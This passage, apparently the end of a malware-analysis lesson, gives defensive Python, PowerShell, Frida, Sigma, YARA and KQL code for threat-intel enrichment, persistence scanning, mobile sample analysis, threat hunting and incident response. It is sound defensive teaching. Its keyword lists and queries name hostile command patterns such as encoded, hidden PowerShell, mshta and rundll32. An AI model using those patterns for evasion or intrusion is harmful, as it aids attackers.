                "first_seen": attributes["first_submission_date"]
            }
        return None
    def check_otx_pulses(self, indicator):
        from OTXv2 import OTXv2, IndicatorTypes
        otx = OTXv2(self.otx_api_key)
        # The SDK expects an IndicatorTypes constant; this assumes a SHA-256 hash
        details = otx.get_indicator_details_full(IndicatorTypes.FILE_HASH_SHA256,
                                                 indicator)
        pulses = details["general"]["pulse_info"]["pulses"]
        return {
            "pulse_count": len(pulses),
            "pulses": pulses[:5]  # First 5
        }
    def submit_to_misp(self, analysis_results):
        from pymisp import PyMISP, MISPEvent, MISPObject
        misp = PyMISP(self.misp_url, self.misp_key)
        event = MISPEvent()
        event.info = f"Automated Analysis: {analysis_results['hash']}"
        event.threat_level_id = 2  # Medium
        event.analysis = 2  # Completed
        # Add file object
        file_obj = MISPObject('file')
        file_obj.add_attribute('sha256', value=analysis_results['hash'])
        file_obj.add_attribute('filename', value=analysis_results.get('filename', 'unknown'))
        # Add network indicators
        for domain in analysis_results.get('contacted_domains', []):
            event.add_attribute('domain', domain)
        event.add_object(file_obj)
        result = misp.add_event(event)
        return result
Automated Reporting
Report Generation:
from datetime import datetime
from jinja2 import Template
import pdfkit
class ReportGenerator:
    def __init__(self, template_path):
        with open(template_path, 'r') as f:
            self.template = Template(f.read())
    def generate_html_report(self, analysis_results):
        html_content = self.template.render(
            sample=analysis_results,
            timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
            analyst="Automated Analysis System"
        )
        return html_content
    def generate_pdf_report(self, analysis_results, output_path):
        # pdfkit requires the wkhtmltopdf binary to be installed
        html_content = self.generate_html_report(analysis_results)
        options = {
            'page-size': 'A4',
            'margin-top': '0.75in',
            'margin-right': '0.75in',
            'margin-bottom': '0.75in',
            'margin-left': '0.75in',
            'encoding': "UTF-8",
            'no-outline': None
        }
        pdfkit.from_string(html_content, output_path, options=options)
8. Advanced Persistence Mechanism Analysis
Registry Persistence
Common Registry Locations:
# Registry monitoring script
import winreg
PERSISTENCE_KEYS = [
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"),
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce"),
    # Image File Execution Options (IFEO); Debugger values live in
    # per-image subkeys, which this scan does not enumerate
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"),
    # AppInit_DLLs
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"),
    # Winlogon
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"),
]
def scan_persistence_registry():
    findings = []
    for hive, key_path in PERSISTENCE_KEYS:
        try:
            with winreg.OpenKey(hive, key_path, 0, winreg.KEY_READ) as key:
                i = 0
                while True:
                    try:
                        name, value, _value_type = winreg.EnumValue(key, i)
                    except OSError:
                        break  # No more values under this key
                    findings.append({
                        "hive": hive,
                        "key": key_path,
                        "name": name,
                        "value": value,
                        "suspicious": analyze_suspicious_entry(name, value)
                    })
                    i += 1
        except OSError:
            continue  # Key missing or access denied
    return findings
def analyze_suspicious_entry(name, value):
    suspicious_indicators = [
        "powershell",
        "cmd.exe /c",
        "wscript",
        "mshta",
        "rundll32",
        "regsvr32",
        "-enc",
        "-nop",
        "-w hidden",
        "http://",
        "https://",
        ".ps1",
        ".vbs",
        ".js"
    ]
    # Values can be integers or bytes (REG_DWORD, REG_BINARY), so convert first
    value_lower = str(value).lower()
    return any(indicator in value_lower for indicator in suspicious_indicators)
Scheduled Task Persistence
Analyzing Scheduled Tasks:
# PowerShell script to examine scheduled tasks
$suspiciousTasks = Get-ScheduledTask | Where-Object {
    $_.Actions.Execute -match 'powershell|cmd|wscript|mshta|rundll32' -or
    $_.Actions.Arguments -match '-enc|-nop|hidden|http'
} | Select-Object TaskName, TaskPath, State, Author, Date, Actions
# Export detailed task information
foreach ($task in $suspiciousTasks) {
    # Pass TaskPath as well, because task names are only unique within a folder
    $taskInfo = Get-ScheduledTaskInfo -TaskName $task.TaskName -TaskPath $task.TaskPath
    $task | Add-Member -NotePropertyName LastRunTime -NotePropertyValue $taskInfo.LastRunTime
    $task | Add-Member -NotePropertyName NextRunTime -NotePropertyValue $taskInfo.NextRunTime
    # Export task XML for analysis
    Export-ScheduledTask -TaskName $task.TaskName -TaskPath $task.TaskPath |
        Out-File "C:\Analysis\Tasks\$($task.TaskName).xml"
}
Service-Based Persistence
Service Analysis:
import wmi
import subprocess
def analyze_services():
    c = wmi.WMI()
    suspicious_services = []
    for service in c.Win32_Service():
        # Check for suspicious characteristics
        if any([
            not service.PathName,
            service.PathName and 'temp' in service.PathName.lower(),
            service.PathName and 'appdata' in service.PathName.lower(),
            service.PathName and any(sus in service.PathName.lower()
                                     for sus in ['powershell', 'cmd.exe', 'wscript']),
            service.StartName and service.StartName.lower() not in
                ['localsystem', 'nt authority\\system', 'nt authority\\localservice',
                 'nt authority\\networkservice']
        ]):
            suspicious_services.append({
                'name': service.Name,
                'display_name': service.DisplayName,
                'path': service.PathName,
                'start_type': service.StartMode,
                'account': service.StartName,
                'state': service.State,
                'description': service.Description
            })
    return suspicious_services
# Check for service DLL hijacking
def check_service_dll_hijacking():
    # Query services that load DLLs
    output = subprocess.check_output([
        'wmic', 'service', 'where',
        "PathName like '%svchost.exe%'",
        'get', 'Name,PathName,ProcessId'
    ], text=True)
    # Check each svchost service's loaded DLLs
    # ... (implementation details)
9. Mobile Malware Analysis Fundamentals
Android Malware Analysis
Setting Up Android Analysis Environment:
1. Android Virtual Device (AVD):
# Create AVD with Google APIs (for Play Services)
avdmanager create avd -n malware_analysis -k "system-images;android-29;google_apis;x86"
# Start emulator with writable system
emulator -avd malware_analysis -writable-system -no-snapshot
2. Essential Tools:
- jadx: DEX to Java decompiler
- apktool: APK reverse engineering
- Frida: Dynamic instrumentation
- MobSF: Mobile Security Framework
Static Analysis Workflow:
# Extract APK contents
apktool d malicious.apk -o malicious_decoded/
# Examine AndroidManifest.xml
cat malicious_decoded/AndroidManifest.xml | grep -E "permission|service|receiver"
# Decompile to Java
jadx malicious.apk -d jadx_output/
# Search for suspicious patterns
grep -r "exec\|Runtime\|ProcessBuilder" jadx_output/
grep -r "DexClassLoader\|PathClassLoader" jadx_output/
grep -r "android.permission.SEND_SMS" jadx_output/
Dynamic Analysis with Frida:
// Frida script to monitor sensitive API calls
Java.perform(function() {
    // Monitor SMS sending (select the overload explicitly; Frida raises an
    // error when a method with several overloads is hooked without one)
    var SmsManager = Java.use('android.telephony.SmsManager');
    SmsManager.sendTextMessage.overload('java.lang.String', 'java.lang.String',
        'java.lang.String', 'android.app.PendingIntent',
        'android.app.PendingIntent').implementation = function(dest, sc, text, pi, di) {
        console.log('[SMS] Destination: ' + dest);
        console.log('[SMS] Text: ' + text);
        // Call original method
        return this.sendTextMessage(dest, sc, text, pi, di);
    };
    // Monitor file access
    var File = Java.use('java.io.File');
    File.$init.overload('java.lang.String').implementation = function(path) {
        console.log('[File] Accessing: ' + path);
        return this.$init(path);
    };
    // Monitor network connections (openConnection() also has a Proxy overload)
    var URL = Java.use('java.net.URL');
    URL.openConnection.overload().implementation = function() {
        console.log('[Network] Connecting to: ' + this.toString());
        return this.openConnection();
    };
});
iOS Malware Analysis
Jailbroken Device Setup:
1. Essential Cydia Tools:
- Frida
- SSL Kill Switch 2
- dumpdecrypted
- class-dump
2. Binary Analysis:
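# Decrypt the app binary (run on the device; dumpdecrypted is injected into the app at launch)
DYLD_INSERT_LIBRARIES=dumpdecrypted.dylib ./MaliciousApp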
# Extract class information
class-dump -H MaliciousApp -o headers/
# Check for suspicious frameworks
otool -L MaliciousApp | grep -v "/System"
10. Threat Hunting with Analysis Results
Creating Detection Rules
Sigma Rules from Analysis:
title: Ransomware File Encryption Activity
id: a1b2c3d4-5678-9012-3456-789012345678
status: experimental
description: Detects mass file encryption typical of ransomware
author: Security Analyst
date: 2024/01/01
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID: 11 # File creation
        TargetFilename|endswith:
            - '.locked'
            - '.encrypted'
            - '.crypto'
    timeframe: 10s
    condition: selection | count() > 100
falsepositives:
    - Legitimate encryption software
level: high
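The rule's logic, more than 100 matching file creations within 10 seconds, can be prototyped against exported events before it is deployed. The sketch below uses a sliding window; actual Sigma backends may evaluate the timeframe in fixed buckets instead, so counts near the threshold can differ. The event shape (timestamp in seconds, filename) and the function name are assumptions.

```python
from collections import deque

SUSPICIOUS_EXTENSIONS = ('.locked', '.encrypted', '.crypto')


def detect_mass_encryption(events, threshold=100, window=10.0):
    """Return the timestamp at which the rule would fire, or None.

    events: iterable of (timestamp_seconds, filename), sorted by time.
    """
    recent = deque()
    for ts, filename in events:
        if not filename.lower().endswith(SUSPICIOUS_EXTENSIONS):
            continue
        recent.append(ts)
        # Drop events that have fallen out of the time window
        while recent and ts - recent[0] > window:
            recent.popleft()
        if len(recent) > threshold:
            return ts
    return None


if __name__ == "__main__":
    burst = [(i / 20, f"doc{i}.docx.locked") for i in range(150)]
    print(detect_mass_encryption(burst))
```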
Converting to YARA:
rule Ransomware_Encryption_Routine {
    meta:
        description = "Detects ransomware encryption functions"
        author = "Analysis Team"
        date = "2024-01-01"
    strings:
        $api1 = "CryptGenRandom"
        $api2 = "CryptEncrypt"
        $api3 = "CryptAcquireContext"
        $str1 = "Your files have been encrypted"
        $str2 = ".locked"
        $pattern = {48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 85 C0}
    condition:
        uint16(0) == 0x5A4D and
        all of ($api*) and
        any of ($str*) and
        $pattern
}
Threat Hunting Queries
KQL Queries for Threat Hunting:
// Process injection detection
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName in~ ("notepad.exe", "calc.exe", "svchost.exe")
| where InitiatingProcessFileName !in~ ("services.exe", "winlogon.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine
| where ProcessCommandLine contains "powershell" or
ProcessCommandLine contains "cmd"
// Suspicious PowerShell execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "powershell.exe"
| where ProcessCommandLine contains "-enc" or
ProcessCommandLine contains "-nop" or
ProcessCommandLine contains "-w hidden"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessFileName
| summarize Count = count() by DeviceName, bin(Timestamp, 1h)
| where Count > 10
Incident Response Integration
Automated Response Playbook:
import subprocess
class IncidentResponseAutomation:
    def __init__(self, analysis_results):
        self.results = analysis_results
        self.ioc_list = self.extract_iocs()
    def extract_iocs(self):
        iocs = {
            'file_hashes': [],
            'domains': [],
            'ip_addresses': [],
            'file_paths': [],
            'registry_keys': [],
            'mutexes': []
        }
        # Extract from analysis results
        # ... (parsing logic)
        return iocs
    def block_network_iocs(self):
        # Update firewall rules on a Windows host. netsh's remoteip parameter
        # takes IP addresses, not domain names, so block the extracted IPs here.
        for ip in self.ioc_list['ip_addresses']:
            subprocess.run(['netsh', 'advfirewall', 'firewall', 'add', 'rule',
                            f'name=Block_{ip}', 'dir=out', 'action=block',
                            f'remoteip={ip}'])
        # Update DNS blackhole for domains (run on the BIND DNS server)
        with open('/etc/bind/blackhole.conf', 'a') as f:
            for domain in self.ioc_list['domains']:
                f.write(f'zone "{domain}" {{ type master; file "/etc/bind/db.blackhole"; }};\n')
    def deploy_yara_rules(self):
        # Generate YARA rule from analysis (generate_yara_rule is not shown here)
        rule = self.generate_yara_rule()
        # Deploy to endpoints
        # ... (deployment logic)
    def create_investigation_timeline(self):
        timeline = []
        # Process creation events
        for event in self.results.get('process_events', []):
            timeline.append({
                'timestamp': event['timestamp'],
                'type': 'process_creation',
                'details': event
            })
        # Network events
        for event in self.results.get('network_events', []):
            timeline.append({
                'timestamp': event['timestamp'],
                'type': 'network_connection',
                'details': event
            })
        # Sort by timestamp
        timeline.sort(key=lambda x: x['timestamp'])
        return timeline
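The IOC parsing step is left open in the playbook. One simple starting point is regex extraction from report text, sketched below. The patterns are deliberately narrow assumptions (SHA-256 hashes only, IPv4 only, a short hypothetical list of top-level domains) and will need tuning to avoid false positives such as version numbers that look like IP addresses.

```python
import re

# Illustrative patterns; extend the TLD list and add IPv6/MD5 as needed
IOC_PATTERNS = {
    'file_hashes': re.compile(r'\b[a-fA-F0-9]{64}\b'),
    'ip_addresses': re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b'),
    'domains': re.compile(r'\b(?:[a-z0-9-]+\.)+(?:com|net|org|onion)\b', re.I),
}


def extract_iocs_from_text(text: str) -> dict:
    """Return de-duplicated, sorted IOC candidates found in free text."""
    return {kind: sorted(set(pattern.findall(text)))
            for kind, pattern in IOC_PATTERNS.items()}


if __name__ == "__main__":
    report = ("beacon to c2.malicious-c2.com at 203.0.113.7, sha256 "
              + "ab" * 32)
    print(extract_iocs_from_text(report))
```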
This lesson has covered advanced malware analysis techniques including:
- Advanced unpacking and deobfuscation methods
- Cryptographic function reverse engineering
- Sophisticated injection technique analysis
- Fileless malware investigation
- C2 protocol reverse engineering
- Practical ransomware case study
- Automation pipeline development
- Persistence mechanism analysis
- Mobile malware fundamentals
- Threat hunting integration
These techniques build upon the fundamentals from Lesson 1, providing security professionals with practical skills for analyzing sophisticated threats. Malware analysis is an evolving field, so continually update your skills and tools to keep pace with emerging threats.
Key Takeaways
- Automation is Essential: Build repeatable processes to handle the volume of threats
- Context Matters: Understanding the full attack chain is more valuable than isolated IOCs
- Share Intelligence: Contributing to the security community strengthens collective defense
- Continuous Learning: New techniques emerge constantly - stay current with research
What's next?
- Practice with malware analysis challenges and CTFs
- Contribute to open-source security projects
- Share findings with the security community
- Build relationships with other analysts
Remember: The goal is always to improve defenses and protect systems, not to enable malicious activities.